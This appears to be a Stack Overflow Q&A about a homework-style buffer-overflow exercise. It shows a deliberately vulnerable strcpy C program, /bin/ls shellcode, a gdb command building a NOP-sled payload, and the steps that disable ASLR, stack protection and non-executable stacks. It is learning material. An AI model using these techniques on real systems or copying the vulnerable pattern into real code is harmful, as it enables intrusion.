# Homework - Cannot exploit bufferoverflow

Tags: c, buffer-overflow, shellcode

I am trying to learn to exploit simple bufferover flow technique on Backtrack Linux.

Here is my C program

```
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
    char buffer[500];
    if(argc==2)
    {

    strcpy(buffer, argv[1]);  //vulnerable function

    }

    return 0;
}
```

This is the shellcode I am using, which corresponds to simple `/bin/ls`
\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x6e\x2f\x6c\x73\x66\x68\x62\x69\x83\xec\x01\xc6\x04\x24\x2f\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80

I inject this shellcode in gdb using following command

```
run $(python -c 'print "\x90" * 331 + "\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x6e\x2f\x6c\x73\x66\x68\x62\x69\x83\xec\x01\xc6\x04\x24\x2f\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80" + "\x0c\xd3\xff\xff"*35')
```

As I step through the application, it generates `SIG FAULT` on final `ret` instruction. At that point `EIP` is correctly set to `0xffffd30c`. This address is addressable and contains series of `NOP`, followed by my shell code as shown in the payload.

I have disabled the ASLR
`sudo echo 0 > /proc/sys/kernel/randomize_va_space`

and also compiled my binary using `fno-stack-protector` option.

Any idea what's the cause of SIGSEGV ?

Comment: Can you post the gdb output? Extra sets of eyes might help catch something

Comment: @pepsi : I found the problem, the stack area was non executable, I have enabled it using gcc

Comment: Everybody working on the same project again?  http://stackoverflow.com/questions/6962770/shellcodes-not-working

Answer (score 8, accepted):

I have answered my own question, the problem was "Executable Stack Protection", where in stack memory cannot be executed. This can be disabled in gcc as follows

`gcc -z execstack`

Answer (score 1):

Have you disabled stack smashing protection in GCC (-fno-stack-protector)?

[How to turn off gcc compiler optimization to enable buffer overflow](https://stackoverflow.com/questions/2340259/how-to-turn-off-gcc-compiler-optimization-to-enable-buffer-overflow)

Comment: Yes, I did it , I am updating the post